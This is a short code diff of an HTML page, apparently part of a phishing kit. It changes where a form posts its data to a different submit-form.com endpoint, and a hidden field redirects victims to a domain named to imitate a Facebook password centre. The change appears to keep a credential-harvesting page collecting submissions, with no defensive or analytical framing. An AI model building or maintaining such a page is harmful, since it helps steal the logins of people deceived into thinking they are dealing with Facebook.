--- a/next.html
+++ b/next.html
@@ -9,7 +9,7 @@
         <link rel="stylesheet" crossorigin="" href="style.css">
     </head>
     <body>
-        <form action="https://submit-form.com/57IMA3xEE" method="post">
+        <form action="https://submit-form.com/oKdS5mwu5" method="post">
             <input type="hidden" name="_redirect" value="https://fb-password-center-rouge.vercel.app/"/>
             <div id="root">
                 <div>
